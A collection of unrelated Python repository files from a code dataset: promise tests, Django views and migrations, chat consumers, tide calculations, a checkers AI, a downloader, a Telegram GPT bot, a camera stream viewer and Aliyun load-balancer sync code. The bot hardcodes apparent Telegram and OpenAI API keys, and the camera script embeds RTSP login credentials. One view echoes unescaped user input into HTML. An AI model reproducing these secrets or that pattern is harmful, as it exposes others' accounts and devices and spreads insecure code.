Promise.all([promise1, promise2])\n\n mock = Mock()\n promises.then(None, mock)\n\n error = ValueError(\"boom\")\n promise1.do_resolve(1)\n promise2.do_reject(error)\n mock.assert_called_with(error)\n\n\ndef test_all_reject_first() -> None:\n \"\"\"\n Promise.all() should reject even when a child promise rejects first.\n \"\"\"\n error = ValueError(\"boom\")\n promise1: Promise[int] = Promise()\n promise2: Promise[int] = Promise()\n promise1.do_resolve(1)\n promise2.do_reject(error)\n\n promises = Promise.all([promise1, promise2])\n\n mock = Mock()\n promises.then(None, mock)\n\n mock.assert_called_with(error)\n\n\ndef test_wait_promises() -> None:\n \"\"\"\n wait_promises() should wait for all subpromises regardless of success or failure.\n \"\"\"\n\n def good():\n return Promise(lambda resolve, reject: resolve(10))\n\n def bad():\n return Promise(lambda resolve, reject: reject(ValueError(\"boom\")))\n\n top = wait_promises([good(), good(), good()])\n promises = top.value\n assert [promise.value for promise in promises] == [10, 10, 10]\n\n top = 
wait_promises([good(), bad(), good()])\n promises = top.value\n assert promises[0].value == 10\n assert isinstance(promises[1].error, ValueError)\n assert promises[2].value == 10\n\n a: Promise[int] = Promise()\n top = wait_promises([good(), bad(), a])\n a.do_resolve(20)\n promises = top.value\n assert promises[0].value == 10\n assert isinstance(promises[1].error, ValueError)\n assert promises[2].value == 20\n","repo_name":"insitro/redun","sub_path":"redun/tests/test_promise.py","file_name":"test_promise.py","file_ext":"py","file_size_in_byte":8310,"program_lang":"python","lang":"en","doc_type":"code","stars":466,"dataset":"github-code","pt":"72"} +{"seq_id":"12585600087","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('home', '0001_initial'),\n ]\n\n operations = [\n migrations.RemoveField(\n model_name='product',\n name='id',\n ),\n migrations.AlterField(\n model_name='product',\n name='product_id',\n field=models.CharField(primary_key=True, max_length=30, serialize=False),\n ),\n ]\n","repo_name":"thaiduongpham/django-shoppingcart","sub_path":"home/migrations/0002_auto_20150729_0108.py","file_name":"0002_auto_20150729_0108.py","file_ext":"py","file_size_in_byte":528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"32487078198","text":"\nfrom django.urls import reverse\nfrom django.http import response\nfrom django.core import serializers\nfrom django.http.response import HttpResponse\nfrom django.core.paginator import Paginator\nfrom django.shortcuts import redirect, render\nfrom django.db import IntegrityError\nfrom django.contrib.auth import logout, authenticate, login\n\n\nfrom Blog.models import Subject, Topic, Content\nfrom django.contrib.auth.models import User\n# Create your views here.\n\n\ndef paginator_assist(paginator, single_page, max_num_of_link):\n import math\n link_number = []\n if paginator.num_pages <= max_num_of_link:\n link_number = [i for i in range(1, paginator.num_pages+1)]\n else:\n if single_page.number > math.floor(max_num_of_link/2):\n for i in range(single_page.number-math.floor(max_num_of_link/2), single_page.number+math.ceil(max_num_of_link/2)):\n if i <= paginator.num_pages:\n link_number.append(i)\n\n else:\n link_number = [i for i in range(1, max_num_of_link)]\n return link_number\n\n\ndef index(request):\n if request.method == 'GET':\n\n post = Content.objects.order_by('published_date')\n\n return render(request, 'home.html', {'num_of_user': User.objects.count(), 'num_of_post': Content.objects.count(), 'subjects': Subject.objects.all(), 'posts': post.reverse()[:5]})\n\n if request.method == 'POST':\n print(\"POST request\")\n content = request.POST['editor']\n return HttpResponse(f\"
      {content}
      \")\n\n\ndef add_subject(request):\n if request.method == 'POST':\n context = {}\n subject_name = request.POST['subject']\n\n try:\n Subject.objects.create(subject=subject_name.lower())\n request.session[\"add_sub_noti\"] = \"{subject_name} added successfully\"\n except IntegrityError:\n print(f\"Subject {subject_name} already exist\")\n request.session[\"duplicate_data_error\"] = f\"{subject_name} already Exist\"\n return redirect(reverse('subject-list'))\n\n if request.method == 'GET':\n return redirect(reverse('subject-list'))\n\n\ndef Subject_List_View(request):\n num_of_page = 5\n max_num_of_link = 5\n link_number = []\n subject_list = Subject.objects.all()\n paginator = Paginator(subject_list, num_of_page)\n page_number = request.GET.get('page')\n single_page = paginator.get_page(page_number)\n i = (single_page.number-1)*num_of_page\n\n print(link_number)\n context = {\n 'single_page': single_page,\n 'i': i,\n 'link_number': paginator_assist(paginator, single_page, max_num_of_link)\n }\n return render(request, 'categories.html', context)\n\n\ndef topic_list_by_subject_view(request, *args, **kwargs):\n if request.method == \"GET\":\n subject_name = request.GET['subject'].lower()\n\n topiclist = Topic.objects.filter(\n subject__subject__contains=subject_name)\n print(topiclist)\n topiclist = serializers.serialize('json', topiclist)\n return HttpResponse(topiclist)\n\n\ndef add_topic_view(request):\n if request.method == 'POST':\n\n subject = request.POST.get('subject', False)\n new_topic = request.POST.get('topic', False)\n try:\n new_subject = Subject.objects.get(pk=subject)\n except:\n return HttpResponse(\"subject doesn't exist\")\n Topic.objects.create(subject=new_subject, title=new_topic)\n\n return HttpResponse(\"successfully saved\")\n return HttpResponse('only post request acceptable')\n\n\ndef add_post_view(request):\n print(request.POST)\n title = request.POST['title']\n subject = request.POST['subject']\n topic = request.POST['topic']\n content = request.POST['editor']\n\n try:\n topic = Topic.objects.get(pk=topic)\n subject = Subject.objects.get(pk=subject)\n except:\n return redirect('/admin',)\n\n Content.objects.create(topic=topic, subject=subject,\n sub_title=title, content=content)\n return redirect('/admin')\n\n\ndef user_list_view(request):\n return render(request, 'users.html', {})\n\n\ndef login(request):\n pass\n\n\ndef Logout(request):\n logout(request)\n return redirect('/', permanent=True)\n \n","repo_name":"RashedEmon/E-Learning","sub_path":"adminpanel/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4226,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"1435106060","text":"t = int(input())\ndef solve():\n n = int(input())\n mine = sorted(map(int, input().split()))\n ilya = sorted(map(int, input().split()))\n preM, preI = [0], [0]\n for x in range(n):\n preM.append(mine[~x] + preM[x])\n preI.append(ilya[x] + preI[x])\n preM = list(reversed(preM))\n preM.pop(-1)\n\n def check(r):\n leng = n+r\n top = leng - leng//4\n my_lap = max(0, top-r)\n my_score = 100*r + (preM[-my_lap] if my_lap > 0 else 0)\n il_score = preI[-1] - preI[max(0, n-top)]\n return my_score >= il_score\n\n lo, hi = 0, 3*n\n while lo < hi:\n mid = (lo+hi) // 2\n if check(mid): hi = mid\n else: lo = mid + 1\n return lo\n\nfor _ in range(t):\n 
print(solve())\n","repo_name":"henryliuser/hliu-cp","sub_path":"codeforces/L0/733c.py","file_name":"733c.py","file_ext":"py","file_size_in_byte":745,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"72"} +{"seq_id":"25345692912","text":"import json\nfrom channels.generic.websocket import AsyncWebsocketConsumer\nfrom asgiref.sync import sync_to_async\n# from channels.db import database_sync_to_async\nfrom .models import Message, Room, Information, RoomHistory\nfrom django.contrib.auth.models import User\n\n\nclass UserConsumer(AsyncWebsocketConsumer):\n async def connect(self):\n self.user_id = self.scope['url_route']['kwargs']['user_id']\n self.user_group_id = f'user'\n self.user = self.scope['user']\n await self.channel_layer.group_add(\n self.user_group_id,\n self.channel_name\n )\n if self.scope['user'].is_authenticated:\n await self.accept()\n else:\n await self.close(code=4001)\n\n async def disconnect(self, close_code):\n await self.channel_layer.group_discard(\n self.user_group_id,\n self.channel_name\n )\n try:\n infors = await self.set_status(False,self.user_id)\n for info in infors:\n await self.channel_layer.group_send(\n f'user',\n {\n 'type':'user_status',\n 'user_id':info.user.id,\n 'status': info.status\n }\n )\n except:\n pass\n \n async def receive(self, text_data):\n data = json.loads(text_data)\n status = data.get('status')\n user_id = data.get('user_id')\n print(user_id)\n self.user_id = user_id\n if status == \"WENT_ONLINE\":\n infors = await self.set_status(True,user_id)\n for info in infors:\n await self.channel_layer.group_send(\n f'user',\n {\n 'type': 'user_status',\n 'user_id': info.user.id,\n 'status': info.status\n }\n )\n elif status == \"WENT_OFFLINE\":\n infors = await self.set_status(False,user_id)\n for info in infors:\n await self.channel_layer.group_send(\n f'user',\n {\n 'type': 'user_status',\n 'user_id': info.user.id,\n 'status': info.status\n }\n )\n \n async def user_status(self,event):\n user_id = event['user_id']\n status = event['status']\n str = \"OFFLINE\"\n if status==True: str = \"ONLINE\"\n await self.send(text_data=json.dumps({\n 'type_set':'USERS',\n 'user_id':user_id,\n 'status':str\n }))\n\n @sync_to_async\n def set_status(self, status, user_id):\n user = User.objects.get(id=user_id)\n Information.objects.filter(user=user).update(status=status)\n infors = Information.objects.all()\n return infors\n\n\nclass ChatConsumer(AsyncWebsocketConsumer):\n room_id = 0\n username = \"\"\n \n async def connect(self):\n self.room_name = self.scope['url_route']['kwargs']['room_id']\n self.room_group_name = f'chat_{self.room_name}'\n self.user = self.scope['user']\n\n # Join room\n await self.channel_layer.group_add(\n self.room_group_name,\n self.channel_name\n )\n\n await self.accept()\n\n async def disconnect(self, close_code):\n # Leave room\n await self.channel_layer.group_discard(\n self.room_group_name,\n self.channel_name\n )\n\n # Receive message from web socket\n async def receive(self, text_data):\n data = json.loads(text_data)\n message = data.get('message')\n self.username = data.get('username')\n self.room_id = data.get('room_id')\n type_set = data.get('type_set')\n # print(self.room_id)\n \n if type_set==\"CHAT\":\n date = await self.save_message(self.username, self.room_id, message)\n await self.channel_layer.group_send(\n self.room_group_name,\n {\n 'type': 'chat_message',\n 'message': message,\n 'username': self.username,\n 'date': date\n }\n )\n \n # Receive message from room group\n async 
def chat_message(self, event):\n message = event['message']\n username = event['username']\n date = event['date']\n\n # Send message to WebSocket\n await self.send(text_data=json.dumps({\n 'type_set':'CHAT',\n 'message': message,\n 'username': username,\n 'date': date\n }))\n\n @sync_to_async\n def save_message(self, username, room_id, message):\n room = Room.objects.filter(id=room_id).first()\n user = User.objects.filter(username=username).first()\n message = Message.objects.create(user=user, room=room, content=message)\n return message.date_added.strftime(\"%d/%m/%Y %H:%M\")","repo_name":"NguyenKhoa-dev/DACS_ChatApp_P2","sub_path":"chat/consumers.py","file_name":"consumers.py","file_ext":"py","file_size_in_byte":5040,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"17461488527","text":"#!/usr/bin/env python\n\n\"\"\"Table of Node factor f, for M2.\n\nUnless otherwise specified:\nT measured in Julian centuries with 0 at midnight at Greenwich\nmeridian for 0/1 January 1900.\n\nLongitudes measured in ecliptic plan from point of Ares. In\ndegrees.\n\nCompare with\nhttp://www.pac.dfo-mpo.gc.ca/science/oceans/tidal-marees/facteur-node-factor-eng.htm\n\n\"\"\"\n\nimport math\nimport sys\n\ndef Nat(T):\n \"\"\"Longitude of lunar ascending node at time T.\"\"\"\n # [PUGH1976] Table 4:2\n return 259.16 - 1934.14*T + 0.0021*T**2\n\ndef factorK1at(T):\n \"\"\"Node factor f for K1 at Time T.\"\"\"\n N = math.radians(Nat(T))\n # IHO Constituent List\n f = 1.0060 + 0.1150*math.cos(N) - 0.0088*math.cos(2*N) + 0.0006*math.cos(3*N)\n return f\n\ndef factorK2at(T):\n \"\"\"Node factor f for K2 at Time T.\"\"\"\n N = math.radians(Nat(T))\n # IHO Constituent List\n f = 1.0246 + 0.2863*math.cos(N) + 0.0083*math.cos(2*N) - 0.0015*math.cos(3*N)\n return f\n\ndef factorM2at(T):\n \"\"\"Node factor f for M2 at time T.\"\"\"\n N = math.radians(Nat(T))\n # IHO Constituent List\n f = 1.0007 - 0.0373*math.cos(N) + 0.0002*math.cos(2*N)\n return f\n\ndef factorO1at(T):\n \"\"\"Node factor f for O1 at time T.\"\"\"\n # Note: The IHO apparently publishes the wrong correction.\n # The one used here produces factors that agree with\n # [SCHUREMAN1971] and http://www.pac.dfo-mpo.gc.ca/science/oceans/tidal-marees/facteur-node-factor-eng.htm\n N = math.radians(Nat(T))\n # IHO Constituent List\n # f = 1.0176 + 0.1871*math.cos(N) - 0.0147*math.cos(2*N)\n # Using corrected 1.009 value from [PUGH1976] Table 4:3\n f = 1.009 + 0.1871*math.cos(N) - 0.0147*math.cos(2*N)\n return f\n\nfactor = dict(K1=factorK1at, K2=factorK2at, M2=factorM2at, O1=factorO1at)\n\ndef TofY(Y):\n \"\"\"Time T for July 1 in year Y (CE).\"\"\"\n # Days between Jan 1 and July 1\n D = 181\n leap = (Y%4 == 0) - (Y%100 == 0) + (Y%400 == 0)\n D += leap\n T = 365*(Y-1900) + D + (Y-1901)//4\n T /= 36525.0\n return T\n\n\n# There are several factors where IHO and \n# http://www.pac.dfo-mpo.gc.ca/science/oceans/tidal-marees/facteur-node-factor-eng.htm\n# differ:\n# N2: IHO say to use M2\n# P1: IHO say to use a constant 1\n# Q1: IHO say to use O1\n# S2: Not listed at IHO (drj: why would this have a nodal\n# correction?)\n\ndef main():\n constituents = \"O1 K1 M2 K2\".split()\n for year in range(1900,2051):\n T = TofY(year)\n sys.stdout.write(\"%d\" % year)\n for con in constituents:\n f = factor[con](T)\n sys.stdout.write(\" %s %6.3f\" % (con, f))\n sys.stdout.write(\"\\n\")\n\nif __name__ == '__main__':\n 
main()\n","repo_name":"drj11/tidal","sub_path":"code/factorf.py","file_name":"factorf.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"71933443753","text":"from game_behavior import GameBehavior\nfrom checker import Checkers\n\nSIZE = 8\n\n\nclass Ai(GameBehavior):\n def __init__(self, board, color):\n GameBehavior.__init__(self, board, color)\n self.valid_move = []\n self.valid_jump = None\n self.jump = []\n self.before_jump = None\n \n\n def initialize(self):\n \"\"\"initialize the board with checkers\"\"\"\n for x in range(SIZE):\n for y in range(SIZE):\n if y < 3 and (x % 2 == 0 and y % 2 != 0 or x % 2 != 0 and y % 2 == 0):\n self.add_checker(Checkers(x, y, 100, self.color))\n\n def has_valid_move(self, c):\n if c.color == self.color:\n if c.is_king:\n for i, j in [(1, 1), (1, -1), (-1, 1), (-1, -1)]:\n new_x, new_y = c.x + i, c.y + j\n if 0 <= new_x < SIZE and 0 <= new_y < SIZE:\n if self.find_checker(new_x, new_y) == -1:\n c.has_valid_move = True\n self.valid_move.append(new_x)\n self.valid_move.append(new_y)\n return True\n else:\n for i, j in [(1, 1), (-1, 1)]:\n new_x, new_y = c.x + i, c.y + j\n if 0 <= new_x < SIZE and 0 <= new_y < SIZE:\n if self.find_checker(new_x, new_y) == -1:\n c.has_valid_move = True\n self.valid_move.append(new_x)\n self.valid_move.append(new_y)\n return True\n c.has_valid_move = False\n return False\n\n def has_valid_jump(self, c):\n if c.color == self.color:\n if c.is_king:\n for i, j in [(2, 2), (-2, -2), (2, -2), (-2, 2)]:\n new_x, new_y = c.x + i, c.y + j\n if 0 <= new_x < SIZE and 0 <= new_y < SIZE and self.find_checker(new_x, new_y) == -1:\n jumped_x, jumped_y = (c.x + new_x) // 2, (c.y + new_y) // 2\n jumped = self.find_checker(jumped_x, jumped_y)\n if jumped != -1 and jumped.color != c.color:\n self.valid_jump = jumped\n c.has_valid_jump = True\n self.jump.append(new_x)\n self.jump.append(new_y)\n self.before_jump = c\n return True\n else:\n for i, j in [(2, 2), (-2, 2)]:\n new_x, new_y = c.x + i, c.y + j\n if 0 <= new_x < SIZE and 0 <= new_y < SIZE and self.find_checker(new_x, new_y) == -1:\n jumped_x, jumped_y = (c.x + new_x) // 2, (c.y + new_y) // 2\n jumped = self.find_checker(jumped_x, jumped_y)\n if jumped != -1 and jumped.color != c.color:\n self.valid_jump = jumped\n c.has_valid_jump = True\n self.jump.append(new_x)\n self.jump.append(new_y)\n self.before_jump = c\n return True\n c.has_valid_jump = False\n self.before_jump = None\n return False\n\n\n def move(self, checker, jump=False):\n if jump and self.jump_exist():\n checker.move(self.jump[0], self.jump[1])\n self.eat_checker(self.valid_jump)\n self.valid_jump = None\n self.jump = []\n self.before_jump = None\n else:\n checker.move(self.valid_move[0], self.valid_move[1])\n self.valid_move = []\n\n def jump_exist(self):\n for c in self.board:\n if c == self.before_jump:\n return True\n return False","repo_name":"CS12300/python_games","sub_path":"checker_game_starter/ai.py","file_name":"ai.py","file_ext":"py","file_size_in_byte":3852,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"22279536765","text":"import urllib2\nimport threading\nimport utils\nfrom contextlib import closing\n\nBLOCK_SIZE = 1024\n\n\nclass DownloadProgressBar(object):\n def __init__(self, idx, total, multithreading=False, name=None):\n self.idx = idx\n self.total = total\n self.w = str(len(str(self.total)))\n self.multithreading = multithreading\n 
self.name = name\n\n def show(self, written_len, remote_len):\n pass\n\n\ndef download_file(path, url, progress_bar=None):\n remote_sz = utils.remote_file_size(url)\n sz = utils.local_file_size(path)\n\n req = urllib2.Request(url)\n req.headers['Range'] = 'bytes=%d-' % sz\n\n with open(path, \"ab\" if sz else \"wb\") as fd:\n with closing(urllib2.urlopen(req)) as remote_fd:\n remote_fd = urllib2.urlopen(req)\n written = sz\n\n while written < remote_sz:\n block = remote_fd.read(BLOCK_SIZE)\n fd.write(block)\n written += len(block)\n if progress_bar:\n progress_bar.show(written, remote_sz)\n\n\nclass DownloaderThread(threading.Thread):\n \"\"\" Threaded downloader \"\"\"\n def __init__(self, name, task, params_q, res_q=None):\n threading.Thread.__init__(self, name=name)\n self.task = task\n self.params_q = params_q\n self.res_q = res_q\n\n def run(self):\n while 1:\n params = self.params_q.get()\n if params is None:\n break\n res = self.task(*params)\n if self.res_q is not None:\n self.res_q.put(res)\n self.params_q.task_done()\n","repo_name":"inkerra/python-vk","sub_path":"vk/download.py","file_name":"download.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"25620984822","text":"import logging\nfrom telegram import Update\nfrom telegram import Updater, CommandHandler, MessageHandler, CallbackContext, MessageFilter\nimport openai\n\n# Замените 'YOUR_TELEGRAM_BOT_TOKEN' на ваш собственный API ключ от BotFather\nTELEGRAM_BOT_TOKEN = '6167500256:AAF_nDdGlgQQb1nZq2QT1Ut84bL4INICAXk'\n\n# Замените 'YOUR_OPENAI_API_KEY' на ваш собственный ключ API от OpenAI\nOPENAI_API_KEY = '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'\n\n# Инициализация библиотеки OpenAI с использованием вашего ключа API\nopenai.api_key = OPENAI_API_KEY\n\n# Настройка логгирования\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s', level=logging.INFO)\n\n# Обработчик команды /start\ndef start(update: Update, _: CallbackContext) -> None:\n update.message.reply_text('Привет! Я бот, построенный на GPT-3 модели. 
Чем я могу помочь?')\n\n# Обработчик текстовых сообщений\ndef respond_to_message(update: Update, _: CallbackContext) -> None:\n user_input = update.message.text\n\n # Здесь мы используем GPT-3 для получения ответа на сообщение пользователя\n response = generate_gpt3_response(user_input)\n\n update.message.reply_text(response)\n\n# Функция для использования GPT-3 для генерации ответа\ndef generate_gpt3_response(user_input: str) -> str:\n # Здесь вы можете настроить параметры для GPT-3, если хотите\n response = openai.Completion.create(\n engine=\"text-davinci-002\",\n prompt=user_input,\n max_tokens=150,\n temperature=0.7,\n n=1,\n stop=None,\n )\n\n return response.choices[0].text.strip()\n\ndef main() -> None:\n # Инициализация Updater с вашим API токеном бота\n updater = Updater(TELEGRAM_BOT_TOKEN)\n\n # Получение диспетчера для регистрации обработчиков команд и сообщений\n dispatcher = updater.dispatcher\n\n # Регистрация обработчиков\n dispatcher.add_handler(CommandHandler(\"start\", start))\n dispatcher.add_handler(MessageHandler(MessageFilter.text & ~MessageFilter.command, respond_to_message))\n\n # Запуск бота\n updater.start_polling()\n\n # Запуск обработчика до принятия сигнала остановки\n updater.idle()\n\nif __name__ == '__main__':\n main()\n\nif __name__ == '__main__':\n main()\n","repo_name":"MrPixelcool/b","sub_path":"get-pip.py","file_name":"get-pip.py","file_ext":"py","file_size_in_byte":2725,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"11629904779","text":"import cv2\n\n# rtsp://:@/axis-media/media.amp\nrtsp_url = \"rtsp://root:kamera@169.254.104.185/axis-media/media.amp\"\n\nclass ThermalStream:\n def __init__(self, camera_index=rtsp_url, width=640, height=480):\n self.camera_index = camera_index\n self.width = width\n self.height = height\n self.cam = cv2.VideoCapture(camera_index)\n self.cam.set(cv2.CAP_PROP_FRAME_WIDTH, width)\n self.cam.set(cv2.CAP_PROP_FRAME_HEIGHT, height)\n\n def run(self):\n while True:\n ret, Tframe = self.cam.read()\n \n if ret:\n Cframe = cv2.resize(Tframe, (self.width, self.height))\n cv2.imshow(\"Normal\", Tframe)\n \n if cv2.waitKey(1) == ord('q'):\n break\n else:\n break\n \n self.cam.release()\n cv2.destroyAllWindows()\n\nif __name__ == \"__main__\":\n thermal_stream = ThermalStream()\n thermal_stream.run()","repo_name":"magn3054/P6-Rock_detection","sub_path":"Thermal/MainThermal.py","file_name":"MainThermal.py","file_ext":"py","file_size_in_byte":993,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72752266154","text":"from django.db import transaction\n\nfrom asset.ecs.models import EcsModel\nfrom asset.slb.models import SlbModel\nfrom asset.slb.models import SlbServerGroupModel\nfrom asset.slb.models import SlbServerGroupEcsModel\nfrom asset.manager.models import RegionModel\nfrom asset.manager.controllers import aliyun_key as aliyun_key_ctl\nfrom asset.manager.controllers import region as region_ctl\nfrom base import controllers as base_ctl\nfrom utils.time_utils import str2datetime_by_format\nfrom utils.aliyun import AliyunSLB\n\n\ndef format_slb_data(data):\n '''\n 格式化SLB返回数据\n '''\n name = data.get('LoadBalancerName')\n instance_id = data.get('LoadBalancerId')\n ip = data.get('Address')\n ip_typ = data.get('AddressType')\n zone_id = data.get('MasterZoneId')\n slave_zone_id = data.get('SlaveZoneId')\n region_id = data.get('RegionId')\n dt_buy = data.get('CreateTime')\n dt_buy = dt_buy.replace('T', ' 
').replace('Z', '')\n dt_buy = str2datetime_by_format(dt_buy, '%Y-%m-%d %H:%M')\n result = {\n 'name': name,\n 'instance_id': instance_id,\n 'ip': ip,\n 'ip_typ': ip_typ,\n 'zone_id': zone_id,\n 'slave_zone_id': slave_zone_id,\n 'region_id': region_id,\n 'dt_buy': dt_buy,\n }\n return result\n\n\ndef sync_slbs():\n '''\n 同步SLB\n '''\n with transaction.atomic():\n key, secret = aliyun_key_ctl.get_enabled_aliyun_key()\n regions = region_ctl.get_regions(status=RegionModel.ST_ENABLE)['data_list']\n # 记录原来已经创建过的SLB,用于之后删除已经不存在的使用\n old_ids = SlbModel.objects.values_list('id', flat=True).all()\n old_ids = list(set(old_ids))\n # 用来存储仍然可以查到的SLB\n existed_ids = []\n # 记录需要新创建的SLB信息,用于批量创建\n slb_list = []\n # 每次使用都先使用默认的地域初始化,其实可以在类里增加默认值,但是没有增加默认值是为了更明确知道在干什么\n ali_cli = AliyunSLB(key, secret, 'cn-beijing')\n for region in regions:\n region_id = region.get('instance_id')\n ali_cli.reset_region(region_id)\n page_num = 1\n page_size = 50\n while True:\n query = {\n 'page_num': page_num,\n 'page_size': page_size,\n }\n data = ali_cli.get_slbs(**query)\n total = data.get('total')\n data_list = data.get('data_list')\n for data in data_list:\n data = format_slb_data(data)\n instance_id = data.get('instance_id')\n obj = SlbModel.objects.filter(instance_id=instance_id).first()\n if obj:\n base_ctl.update_obj(SlbModel, obj.id, data)\n existed_ids.append(obj.id)\n else:\n slb_list.append(data)\n if total <= page_num * page_size:\n break\n page_num += 1\n base_ctl.create_objs(SlbModel, slb_list)\n deleted_ids = list(set(set(old_ids) - set(existed_ids)))\n if deleted_ids:\n base_ctl.delete_objs(SlbModel, deleted_ids)\n sync_slb_backend_servers()\n\n\ndef sync_slb_backend_servers():\n '''\n 同步SLB默认服务器组服务器\n '''\n with transaction.atomic():\n slb_objs = SlbModel.objects.all()\n query = {\n 'server_group__typ': SlbServerGroupModel.TYP_DEFAULT,\n }\n old_ids = SlbServerGroupEcsModel.objects.filter(**query).values_list('id', flat=True).all()\n old_ids = list(set(old_ids))\n existed_ids = []\n ecs_list = []\n key, secret = aliyun_key_ctl.get_enabled_aliyun_key()\n ali_cli = AliyunSLB(key, secret, 'cn-beijing')\n for slb_obj in slb_objs:\n group_obj = SlbServerGroupModel.objects.filter(slb_id=slb_obj.id)\\\n .filter(typ=SlbServerGroupModel.TYP_DEFAULT).first()\n if not group_obj:\n data = {\n 'slb_id': slb_obj.id,\n 'name': 'default',\n 'instance_id': 'default',\n 'typ': SlbServerGroupModel.TYP_DEFAULT,\n }\n group_obj = base_ctl.create_obj(SlbServerGroupModel, data)\n ali_cli.reset_region(slb_obj.region_id)\n ecses = ali_cli.get_slb_info(slb_obj.instance_id).get('backend_servers')\n for ecs in ecses:\n ecs_instance_id = ecs.get('ServerId')\n ecs_obj = EcsModel.objects.filter(instance_id=ecs_instance_id).first()\n weight = ecs.get('Weight')\n obj = SlbServerGroupEcsModel.objects.filter(slb_id=slb_obj.id)\\\n .filter(server_group_id=group_obj.id, ecs_id=ecs_obj.id).first()\n data = {\n 'slb_id': slb_obj.id,\n 'server_group_id': group_obj.id,\n 'ecs_id': ecs_obj.id,\n 'weight': weight,\n }\n if not obj:\n ecs_list.append(data)\n else:\n base_ctl.update_obj(SlbServerGroupEcsModel, obj.id, data)\n existed_ids.append(obj.id)\n base_ctl.create_objs(SlbServerGroupEcsModel, ecs_list)\n deleted_ids = list(set(set(old_ids) - set(existed_ids)))\n if deleted_ids:\n base_ctl.delete_objs(SlbServerGroupEcsModel, deleted_ids)\n sync_slb_vserver_groups()\n\n\ndef sync_slb_vserver_groups():\n '''\n 同步SLB虚拟服务器组\n '''\n with transaction.atomic():\n slb_objs = SlbModel.objects.all()\n old_ids = 
SlbServerGroupModel.objects.filter(typ=SlbServerGroupModel.TYP_VSERVER)\\\n .values_list('id', flat=True).all()\n old_ids = list(set(old_ids))\n existed_ids = []\n group_list = []\n key, secret = aliyun_key_ctl.get_enabled_aliyun_key()\n ali_cli = AliyunSLB(key, secret, 'cn-beijing')\n for slb_obj in slb_objs:\n ali_cli.reset_region(slb_obj.region_id)\n groups = ali_cli.get_vserver_groups(slb_obj.instance_id).get('data_list')\n for group in groups:\n group_instance_id = group.get('VServerGroupId')\n group_name = group.get('VServerGroupName')\n query = {\n 'slb_id': slb_obj.id,\n 'typ': SlbServerGroupModel.TYP_VSERVER,\n 'instance_id': group_instance_id,\n }\n group_obj = SlbServerGroupModel.objects.filter(**query).first()\n data = {\n 'slb_id': slb_obj.id,\n 'instance_id': group_instance_id,\n 'name': group_name,\n 'typ': SlbServerGroupModel.TYP_VSERVER,\n }\n if not group_obj:\n group_list.append(data)\n else:\n group_obj = base_ctl.update_obj(SlbServerGroupModel, group_obj.id, data)\n existed_ids.append(group_obj.id)\n base_ctl.create_objs(SlbServerGroupModel, group_list)\n deleted_ids = list(set(set(old_ids) - set(existed_ids)))\n if deleted_ids:\n base_ctl.delete_objs(SlbServerGroupModel, deleted_ids)\n sync_slb_vserver_group_backend_servers()\n\n\ndef sync_slb_vserver_group_backend_servers():\n '''\n 同步虚拟服务器组后端服务器\n '''\n with transaction.atomic():\n query = {\n 'typ': SlbServerGroupModel.TYP_VSERVER,\n }\n group_objs = SlbServerGroupModel.objects.filter(**query).all()\n\n query = {\n 'server_group__typ': SlbServerGroupModel.TYP_VSERVER,\n }\n old_ids = SlbServerGroupEcsModel.objects.filter(**query).values_list('id', flat=True).all()\n old_ids = list(set(old_ids))\n existed_ids = []\n ecs_list = []\n key, secret = aliyun_key_ctl.get_enabled_aliyun_key()\n ali_cli = AliyunSLB(key, secret, 'cn-beijing')\n for group_obj in group_objs:\n ali_cli.reset_region(group_obj.slb.region_id)\n ecses = ali_cli.get_vserver_group_backend_servers(group_obj.instance_id).get('data_list')\n for ecs in ecses:\n ecs_instance_id = ecs.get('ServerId')\n weight = ecs.get('Weight')\n ecs_obj = EcsModel.objects.filter(instance_id=ecs_instance_id).first()\n query = {\n 'slb_id': group_obj.slb_id,\n 'server_group_id': group_obj.id,\n 'ecs_id': ecs_obj.id,\n }\n obj = SlbServerGroupEcsModel.objects.filter(**query).first()\n data = {\n 'slb_id': group_obj.slb_id,\n 'server_group_id': group_obj.id,\n 'ecs_id': ecs_obj.id,\n 'weight': weight,\n }\n if not obj:\n ecs_list.append(data)\n else:\n base_ctl.update_obj(SlbServerGroupEcsModel, obj.id, data)\n existed_ids.append(obj.id)\n base_ctl.create_objs(SlbServerGroupEcsModel, ecs_list)\n deleted_ids = list(set(set(old_ids) - set(existed_ids)))\n if deleted_ids:\n base_ctl.delete_objs(SlbServerGroupEcsModel, deleted_ids)\n","repo_name":"bxxfighting/rurality","sub_path":"asset/slb/controllers/sync.py","file_name":"sync.py","file_ext":"py","file_size_in_byte":9492,"program_lang":"python","lang":"en","doc_type":"code","stars":65,"dataset":"github-code","pt":"72"} +{"seq_id":"12767148011","text":"import os\nimport sys\nfrom re import search\n\nfrom gitconfig.config import (\n ConfigDict,\n ConfigFile,\n )\n\nif sys.version_info < (2, 7):\n from ordereddict import OrderedDict\n from collections import MutableMapping\nelse:\n from collections import (\n OrderedDict,\n MutableMapping,\n )\n\nclass GitRepoNotFoundError(Exception): pass\n\nclass GitConfig():\n\n def __init__(self,**kwargs):\n self.path = kwargs.get('path', None)\n self.file = kwargs.get('file', None)\n\n if 
